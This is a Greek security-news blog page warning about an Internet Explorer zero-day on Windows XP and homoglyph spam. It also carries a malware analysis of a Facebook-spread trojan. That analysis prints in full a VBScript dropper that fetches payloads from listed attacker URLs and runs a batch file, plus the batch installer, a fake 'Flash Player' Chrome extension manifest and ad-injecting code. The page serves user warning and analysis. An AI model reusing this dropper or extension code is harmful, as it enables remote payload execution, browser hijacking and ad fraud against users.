Μεγάλη ΠΡΟΣΟΧΗόσοι χρήστες χρησιμοποιούν ακόμα Windows Xp!!

Γνωρίζεται (από προηγούμενο άρθρο μας) ότι η Microsoft, έχει σταματήσει την υποστήριξη των Windows XP. Αυτό σημαίνει ότι η εταιρεία δεν διαθέτει πλέον patches,updates επιδιόρθωσης κενών ασφαλείας για το συγκεκριμένο λειτουργικό.

Zero-Day
Η Microsoft επιβεβαίωσε πρόσφατα ότι μια νέα ευπάθεια (zero-day) στον Internet Explorer θα μπορούσε να χρησιμοποιηθεί για να θέσει σε κίνδυνο συστήματα που τρέχουν τον browser της εταιρείας.

Σύμφωνα με την εταιρεία οι browsers που επηρεάζονται είναι ο Internet Explorer 6Internet Explorer 7, 8, 9, 10, και 11.

Μπορείτε να δείτε την προειδοποίηση της Microsoft από εδώ.

Το exploit αξιοποιεί μια άγνωστη ευπάθεια use-after-free, και χρησιμοποιεί μια πολύ γνωστή τεχνική Flash exploitation για την επίτευξη αυθαίρετης πρόσβασης στη μνήμη για να παρακάμψει τις προστασίες των Windows ASLR και DEP.

Δυστυχώς, τα Windows XP είναι μια από τις πληγείσες πλατφόρμες, και το λειτουργικό σύστημα, δεν λαμβάνει πλέον υποστήριξη από τη Microsoft. Θα πρέπει να αναφέρουμε ότι οι χρήστες που επηρεάζονται από την τελευταία ευπάθεια του IE, είναι αρκετοί καθώς τα Windows XP, εξακολουθούν να είναι εγκατεστημένα στο 28% των υπολογιστών desktop σε όλο τον κόσμο.

Η Microsoft είχε προειδοποίησε ότι κάτι τέτοιο θα μπορούσε να συμβεί, και πρότεινε σε όλους που χρησιμοποιούν το αρχαίο λειτουργικό να αναβαθμίσουν σε νεότερη έκδοση.

Εμπειρογνώμονες ασφαλείας ισχυρίζονται ότι η απενεργοποίηση του Vgx.dll, το οποίο σύμφωνα με τη Microsoft είναι υπεύθυνο για την απόδοση του κώδικα σε ιστοσελίδες VML (Vector Markup Language), θα μπορούσε να είναι ο ευκολότερος τρόπος για να προστατεύσετε ένα σύστημα που χρησιμοποιεί Wwindows XP. Ένας άλλος ευκολότερος τρόπος είναι να αφήσετε τον Internet Explorer και να χρησιμοποιήσετε κάποιον άλλο browser που συνεχίζει να ενημερώνεται.

Αν θέλετε να διαγράψετε το DLL, ανοίξτε ένα παράθυρο γραμμής εντολών με δικαιώματα διαχειριστή και τρέξτε την ακόλουθη εντολή:

regsvr32 -u "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll"

http://iguru.gr/

Advertisements

Προσοχή στο ηλεκτρονικό σας ταχυδρομείο . Κακόβουλα emails παρακάμπτουν τα φίλτρα ανίχνευσης!!

Οι απατεώνες  εφευρίσκουν διαρκώς νέους τρόπους για να παρακάμπτουν τα φίλτρα και τις συμβατικές μεθόδους ανίχνευσης spam. Αυτή τη φορά, οι επιτήδειοι σκέφτηκαν να αντικαταστήσουν ορισμένους χαρακτήρες με παρόμοια σύμβολα και γράμματα, ευελπιστώντας ότι τα e-mail τους θα καταλήξουν στα εισερχόμενα των υποψήφιων παραληπτών.

Spammers-Use-Non-Latin-Characters-to-Evade-Spam-Filters

Σύμφωνα με ερευνητές ασφάλειας της Kaspersky Lab, ο τίτλος και το περιεχόμενο των ανεπιθύμητων μηνυμάτων ηλεκτρονικού ταχυδρομείου μπορεί να φαίνονται φυσιολογικά με την πρώτη ματιά. Ωστόσο, έπειτα από μια πιο προσεκτική ανάγνωση, οι παραλήπτες μπορούν να διαπιστώσουν ότι πολλοί λατινικοί χαρακτήρες έχουν αντικατασταθεί με παρεμφερή σύμβολα από άλλες αλφάβητους.

Αυτή η τάση φαίνεται να είναι δημοφιλής μεταξύ κυβερνοεγκληματιών που στοχεύουν Ιταλούς χρήστες. Οι ειδικοί έχουν εντοπίσει διάφορους τύπους μηνυμάτων spam στα οποία χρησιμοποιείται η συγκεκριμένη τεχνική. Οι spammers χρησιμοποιούν Κυριλλικά, Ελληνικά , ακόμα και σύμβολα IPA για την αντικατάσταση των λατινικών χαρακτήρων.

Αυτό είναι εφικτό λόγω του συστήματος κωδικοποίησης UTF- 8 , το οποίο επιτρέπει στους χρήστες να συνδυάζουν διαφορετικούς τύπους χαρακτήρων στο ίδιο μήνυμα. Χρησιμοποιώντας αυτό το απλό τέχνασμα, οι spammers καταφέρνουν να παρακάμπτουν με επιτυχία τα κλασσικά φίλτρα spam.

Την προσοχή σας λοιπόν στα μηνύματα που διαβάζετε στο ηλεκτρονικό σας ταχυδρομείο καθώς και το τι κατεβάζετε από το ηλεκτρονικό σας ταχυδρομείο

Πηγή : safer-internet.gr , SecNews.Gr

Facebook (ΠΡΟΣΟΧΗ) : Μην ανοίξετε το αρχείο rar που έρχεται σαν μηνυμα!

φαψεβοοκ

Ένα μήνυμα από έναν φίλο μας, μας ενημέρωσε για μια νέα απειλή (Trojan) κυκλοφορεί στο Facebook τις τελευταίες μέρες. Χρησιμοποιώντας την υπηρεσία προσωπικών μηνυμάτων του κοινωνικού δικτύου, οι απατεώνες προσπαθούν να πλασάρουν trοjans στους ανυποψίαστους χρήστες στέλνοντας αρχεία σε μορφή .rar. Ευχαριστούμε την ιστοσελίδα www.secnews.gr για τα παρακάτω κείμενο :

Πριν μερικές ημέρες  και πρώτοι από όλους, οι φίλοι μας στην γνωστή ιστοσελίδα www.safer-internet.gr  μας απέστειλαν το δείγμα από έναν νέο ιό που κυκλοφορούσε στο Facebook και είχε περιέλθει σε γνώση τους. Συγκεκριμένα όπως ανέφερε η σχετική ενημέρωση, ο εν λόγω ιός διαδιδόταν μέσω χρηστών του Facebook, με επισυναπτόμενα αρχεία  Ελληνικής ονοματοθεσίας, κάτι που μας κίνησε εξαρχής ιδιαιτέρως την περιέργεια! Σύμφωνα με αναφορές των συνεργατών μας στο www.safer-internet.gr  δεκάδες χρήστες έχουν πέσει θύματα της επίθεσης και κάνεις δεν έχει προβεί σε ενημέρωση για τον τρόπο αποπομπής του κακόβουλου λογισμικού, μη μπορώντας να γνωρίζουν τι ακριβώς κάνει! Ο ρυθμός διάδοσης του ιού, σύμφωνα με ασφαλέστατες πληροφορίες είναι 12 χρήστες εντός 5 λεπτών!!!

 

To SecNews, με αυξημένο αίσθημα κοινωνικής ευθύνης αναφορικά με την προστασία του συνόλου των ανυποψίαστων χρηστών,πραγματοποίησε πλήρη ανάλυση του ιού, προσδιορίζοντας την ακριβή του λειτουργικότητα και τρόπους προστασίας!

Πως ξεκινά η επίθεση

Το θύμα λάμβανε ένα ή περισσότερα μηνύματα φαινομενικά προερχόμενα από φίλους του με επισυναπτόμενα αρχεία ή/και συνδέσμους link με υποτιθέμενο ενδιαφέρον περιεχόμενο. Σε διαρκή επικοινωνία που είχαμε με τους διαχειριστές της ιστοσελίδας www.safer-internet.gr  έφτασε στα χέρια μας ο σχετικός σύνδεσμος της επίθεσης, Screenshots του οποίου μπορείτε να δείτε παρακάτω.

1

Η τεχνική ομάδα του SecNews αλλά και εξωτερικοί υποστηρικτές-ερευνητές ασφάλειας (ευχαριστούμε θερμά των ερευνητή ασφάλειας MCMC), πραγματοποιήσαν μια πολύωρη ανάλυση του κακόβουλου λογισμικού, την οποία και παραθέτουμε μαζί με τα συμπεράσματα που προέκυψαν. Σημείωση: Τα ονόματα που αναφέρουμε μπορεί να διαφέρουν μιας και παρατηρήθηκαν διαφορετικές versions του κακόβουλου λογισμικού με την ίδια όμως λειτουργικότητα! Πρώτο επίπεδο επίθεσης (1st stage) Μόλις ο ανυποψίαστος χρήστης πραγματοποιήσει λήψη του συμπιεσμένου αρχείου (.rar) με το “ενδιαφέρον” υποτιθέμενο περιεχόμενο, δεν παρατηρεί τίποτα το παράδοξο. Εντός αυτό βρίσκεται το αρχείο “Δες Το!!!.vbs” (visual basic script). Το αρχείο έχει τις παρακάτω εντολές:

Dim oFSO Set oFSO = CreateObject(“Scripting.FileSystemObject”) Dim csPATH : csPATH = CreateObject(“WScript.Shell”).ExpandEnvironmentStrings(“%SYSTEMDRIVE%”) csPATH = csPATH & “\MyFolderakis” ‘ Create a new folder oFSO.CreateFolder csPATH Do download(csPATH) Unzip csPATH &”\content.zip”, csPATH Loop While ReportFileStatus(csPATH &”\sapsalo.jar”)=0 Function download(csPATH) link=RandomLink() dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”) dim bStrm: Set bStrm = createobject(“Adodb.Stream”) xHttp.Open “GET”, link, False xHttp.Send with bStrm .type = 1 ‘//binary .open .write xHttp.responseBody .savetofile csPATH &”\content.zip”, 2 ‘//overwrite end with download = csPATH &”\content.zip” End Function Function ReportFileStatus(filespec) Dim fso, msg Set fso = CreateObject(“Scripting.FileSystemObject”) If (fso.FileExists(filespec)) Then msg = 1 Else msg = 0 End If ReportFileStatus = msg End Function Function RandomLink() sites=Array(“http://xionobala.com/mermikia/moisis.zip”,”http://trendvidz.com/terlix/filezilla.zip”, “http://tromeroi.com/download/adobe.zip”,”http://womfashion.com/aladin/aladin.zip”, “http://yoodot.com/ouzo/gnome.zip”,”http://pepperstonix.com/koitatiegine/tikale.zip”, “http://spatareporo.com/deitetous/simerastonaplha.zip”, “http://fashionofheart.com/vasika/kalisperasas.zip”, “http://masterolious.com/mozilla/firefox.zip”,”http://pentorali.com/safe/internet.zip”) Dim max,min max=UBound(sites) min=LBound(sites) Randomize a=Int((max-min+1)*Rnd+min) RandomLink = sites(a) End Function Sub Unzip(sSource, sTargetDir) Set oFSO = CreateObject(“Scripting.FileSystemObject”) if not oFSO.FolderExists(sTargetDir) then oFSO.CreateFolder(sTargetDir) Set oShell = CreateObject(“Shell.Application”) Set oSource = oShell.NameSpace(sSource).Items() Set oTarget = oShell.NameSpace(sTargetDir) oTarget.CopyHere oSource, 256 End Sub Set WshShell = CreateObject(“WScript.Shell”) WshShell.RUN “cmd /c “& csPATH &”\run.bat” , 2

Πατώντας “klik” στο Δες Τo!!!.vbs για να δεί το υποτιθέμενο ενδιαφέρον αρχείο, πραγματοποιείτε λήψη πρόσθετου λογισμικού από ιστοσελίδα των hackers. Με αυτό τον τρόπο επιτυγχάνουν τον μη εντοπισμό του κακόβουλου λογισμικού από τα antivirus/antimalware, μιας και το VBScript είναι αρχείο κειμένου, που χρησιμοποιεί νόμιμες εντολές των Windows για λήψη αρχείων. Όλα τα πρόσθετα αρχεία τοποθετούντε στον φάκελο “MyFolderakis”, κατεβάζοντας από το flappy-facebook.com. Άρα:

  • Κατεβάζει από ιστοσελίδες που διαθέτουν οι hackers ένα zip αρχείο.Όλα περιέχουν την ίδια backdoor αλλά έχουν διαφορετικά ονόματα για αποπροσανατολισμό.
  • H λήψη πραγματοποιείται από μία από τις 10 τυχαίες IP διευθύνσεις ιστοσελίδων που έχουν δημιουργήσει γιαυτό το σκοπό οι hackers.
  • Αποσυμπιέζει το αρχείο, ελέγχοντας αν αποσυμπιέστηκε επιτυχώς το κύριο αρχείο-malware
  • Εκτελεί το run.bat

Το αρχείο που λαμβάνετε είναι το content.zip. Έτσι η επίθεση προχωράει επιτυχώς στην δεύτερη φάση.

Δεύτερο επίπεδο επίθεσης (2nd stage)

Έχουμε περάσει στο δεύτερο στάδιο της επίθεσης όπου τα αρχεία έχουν τοποθετηθεί εν αγνοία του χρήστη στον υπολογιστή του.

2ndstage.download

Εκτελείτε το run.bat. Δείτε τι κάνει το αρχείο αυτό:

1
2
3
4
5
6
7
8
9
10
11
12
13
@ECHO OFF
IFEXIST“%CommonProgramFiles(x86)%\java”gotojavaexists
IFEXIST“%CommonProgramFiles%\java”gotojavaexists
:installjava
start/w%SYSTEMDRIVE%\MyFolderakis\jre8u5windowsi586iftw.exe/s
if%ERRORLEVEL%==0gotojavaexists
echo Please do not close this or windows installation will be corrupted…
echo Loading…
gotoinstalljava
:javaexists
start%SYSTEMDRIVE%\MyFolderakis\sapsalo.jar

To script ελέγχει αν στον υπολογιστή του χρήστη βρίσκεται εγκατεστημένη η Java. Αν βρεθεί εγκατεστημένη Java προχωρά στην εκτέλεση του sapsalo.jar (σ.σ WTF Σάψαλο????). Αν δεν βρεθεί εγκατεστημένη Java την εγκαθιστά. Η εγκατάσταση γίνεται αθόρυβα χρησιμοποιώντας την παράμετρο /s. Έτσι διασφαλίζουν ότι η εκτέλεση του κεντρικού Malware sapsalo.jar θα εκτελεστεί σίγουρα, ακόμα και στην περίπτωση που η Java δεν προϋπήρχε στον υπολογιστή.

Ανάλυση του ΣΑΨΑΛΟΥ! (sapsalo.jar)

Σάψαλο ως γνωστό σημαίνει το ερείπιο. Αναφορικά με ανθρώπους όμως η πιο κοινή χρήση της λέξης είναι για να περιγράψει κακοβούλως ανθρώπους μιας κάποιας ηλικίας. Λίγο παράδοξο δε νομίζετε, μια τόσο χαρακτηριστική και ιδιότυπη Ελληνική λέξη, χωρίς προέλευση από αντίστοιχη ξένη γλώσσα, να χρησιμοποιηθεί από hackers του εξωτερικού! 

jar.analysis.sapsalo-750x432

Η ανάλυση του ΣΑΨΑΛΟΥ κατέληξε ότι κύριος στόχος του ιού είναι ο browser/περιηγητής ιστοσελίδων του χρήστη.

  • Το κακόβουλο λογισμικό αντιγράφει τον εαυτό του στο “Startup” φάκελο του υπολογιστή. Έτσι σε κάθε επανεκκίνηση εγκαθιστά τον εαυτό του. Ακόμα και αν το διαγράψετε  θα το ξαναβρίσκετε στον browser σας.
  • Τοποθετεί επίσης ένα αντίγραφο του στον φάκελο Chrome, με όνομα ext_folder.zip.
  • Πραγματοποιεί λήψη του ourt.json (Παρακάτω)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
{
    “olmpkfnhkfomcmnodekbphlkkejkealf”:{
            “active_permissions”:{
               “api”:[«storage»,«tabs»],
               “explicit_host”:[«\u003Call_urls>»,«chrome://favicon/*»,«http://*/*»],
               “manifest_permissions”:[  ],
               “scriptable_host”:[«\u003Call_urls>»,«http://*.facebook.com/*»,«https://*.facebook.com/*»]
            },
            “content_settings”:[  ],
            “creation_flags”:1,
            “events”:[  ],
            “from_bookmark”:false,
            “from_webstore”:false,
            “granted_permissions”:{
               “api”:[«storage»,«tabs»],
               “explicit_host”:[«\u003Call_urls>»,«chrome://favicon/*»,«http://*/*»],
               “manifest_permissions”:[  ],
               “scriptable_host”:[«\u003Call_urls>»,«http://*.facebook.com/*»,«https://*.facebook.com/*»]
            },
            “incognito_content_settings”:[  ],
            “incognito_preferences”:{
            },
            “initial_keybindings_set”:true,
            “install_time”:“13042160431700495″,
            “location”:1,
            “manifest”:{
               “background”:{
                  “persistent”:false,
                  “scripts”:[«analytics.js»]
               },
               “content_scripts”:[{
                  «css»:[«jquery-ui.css»],
                  “js”:[«debug_mode.js»,«jquery.js»,«jquery-ui.js»,«sugar.min.js»,«popup.js»],
                  “matches”:[«http://*.facebook.com/*»,«https://*.facebook.com/*»],
                  “run_at”:“document_end”
               },{
                  “all_frames”:true,
                  “exclude_matches”:[«http://*.facebook.com/*»,«https://*.facebook.com/*»],
                  “js”:[«debug_mode.js»,«sugar.min.js»,«URI.js»,«ads-list.js»,«ads.js»],
                  “matches”:[«\u003Call_urls>»]
               }],
               “content_security_policy”:“script-src ‘self’ https://ssl.google-analytics.com; object-src ‘self’”,
               “description”:“Cross-platform plugin plays animations, videos and sound files”,
               “icons”:{
                  “128″:“128.png”,
                  “16″:“16.png”,
                  “48″:“48.png”
               },
               “key”:“MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyRAUY/Q1HimRmGom
V9c9/UWlVmQToGeNZPIxlH5C+g7Ig8/HObGp3G6YqwMNtvG1LF6DgESq7HkuhZpEcrmLmDI8tXQh
5SuYpKJCRcPJhvtOvtYnFbLNPdhg7DN4ZU8v1qhcrSSGfzK8KWPNghsAfL/PEFaobzWH+ZRFQbMsu93
+u9WJFbcGtXT+Kqar7eWIiCeTACobSDbcfaZ1Cj5S0TEZPRtddWvUKSXG3+/wLz236ckZAnz7yzOw
9kBLJL+J3+xm01qhTMc2wv6G0R+zVbC3/UjJcTSdCdY5wGgKgJkDzJ/WNxaGJUXFbKRRsQ3zhe3Xr
KKK+2kcHOjy0dZapQIDAQAB”,
               “manifest_version”:2,
               “name”:“Flash Player”,
               “permissions”:[«tabs»,«\u003Call_urls>»,«storage»,«http://*/»],
               “version”:“2.0″
            },
            “path”:“olmpkfnhkfomcmnodekbphlkkejkealf\\2.0_0″,
            “preferences”:{
            },
            “regular_only_preferences”:{
            },
            “state”:1,
            “was_installed_by_default”:false
         }
}

Ουσιαστικά αυτό είναι και το εντυπωσιακό σημείο κώδικα της κακόβουλης εφαρμογής. Πραγματοποιεί εγκατάσταση κακόβουλου Plugin στον browser του χρήστη με την ονομασία Flash Player (που κανένας φυσικά δεν θα διέγραφε μιας και το θεωρεί απαραίτητο για την θέαση ιστοσελίδων! Η εγκατάσταση πραγματοποιείται τόσο σε Browser Chrome αλλά και σε Firefox!

Ανάλυση του “ψεύτικου” Flash Plugin

Η τεχνική ανάλυση του Plugin είναι ιδιαίτερα περίπλοκη. Θα σταθούμε μόνο στα πολύ ιδιαίτερα σημεία που υποδεικνύουν την χρήση του κακόβουλου λογισμικού.

  • Αναφέρετε σαφώς συγκεκριμένο Google Analytics code, το UA-49290687-2.
  • Ο κώδικας πραγματοποιεί λήψη λίστας διαφημίσεων απo URL τις οποίες και τοποθετεί στο Facebook page. Σαφώς δηλαδή γίνετε εμβολή διαφημίσεων (injection) στον browser του χρήστη εν αγνοία του μέσω του Plugin, κερδίζοντας χρήματα μέσω clicks και views. Ιδιαίτερη σημασία έχει η ελληνική ονοματοθεσία μεταβλητών! (πχ gegonos, diafimiseis sto fb) υποδηλώνοντας σαφώς ότι πρόκειται για Έλληνες εμπνευστές και εκτελεστές της συγκεκριμένης απάτης!
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$(function(){
            chrome.runtime.sendMessage({gegonos:“visit”},function(response){});
            //diafimiseis sto fb
            chrome.storage.sync.get(function(extSettings){
                if(extSettings.ads){
                 varadcounter=0;
                 varadurls=[https://8zxb-2gvn.accessdomain.com/789/ads.php’,
                 functiongetit(url){
                  $.get(url).done(function(b){
                           final_ad_url=url;
                           put_ads(final_ad_url);
                        }).fail(function(a,d,e){
                            console.log(‘fail’,adurls[adcounter])
                                if(adurls[adcounter++])
                                 getit(adurls[adcounter])
                        });
                  }
                getit(adurls[0]);
                  functionput_ads(final_ad_url){
                    $($(‘*[data-ad]‘)).parent().parent().html(‘<iframe id=””style=”position: relative; width: 100%;
height: 620px; border:0;” src=”‘+final_ad_url+‘?choice=1″ id=”someId”/>’)
                    elems1=$.makeArray($(“*[data-dedupekey]“));
                    elems2=$.makeArray($(“*[data-insertion-position]“));
                    elems=elems1.include(elems2).unique();
                    if(elems[0])
                        $(elems[0]).append(‘<iframe src=”‘+final_ad_url+‘?choice=3″ id=”someId”/>’)
                    if(elems[1])
                        $(elems[1]).append(‘<iframe src=”‘+final_ad_url+‘?choice=3″ id=”someId”/>’)
                  }
                }
            })
        })

Σε άλλο σημείο του κώδικα, ρουτίνα λαμβάνει την λίστα φίλων του χρήστη στο Facebook και πραγματοποιεί Like σε προκαθορισμένες σελίδες. Μέσω του Google Analytics code που εντοπίσαμε παραπάνω, οι hackers γνωρίζουν σε ποιον αποστείλατε το κακόβουλο μήνυμα, που έγινε η διασπορά του λογισμικού. Επιπλέον γνωρίζει σε ποιους έχει αποσταλεί το attachment και ποιοι το εκτέλεσαν!

Το σύνολο του κώδικα προς λήψη και ανάλυση από φίλους της ιστοσελίδας μπορείτε να βρείτε εδώ (κωδικός αποσυμπίεσης: malwaresos). ΠΡΟΣΟΧΗ ΚΑΤΑ ΤΗΝ ΛΗΨΗ ΤΟΥ – Ανοίξτε με NOTEPAD++

Ο ερευνητής-φίλος της ιστοσελίδας MCMC εντόπισε επιπλέον κάποια domains που πραγματοποιούν διασπορά του λογισμικού (ΜΗΝ ΚΑΝΕΤΕ ΛΗΨΗ ΤΩΝ ZIP)

secnews.gr , safer-internet.gr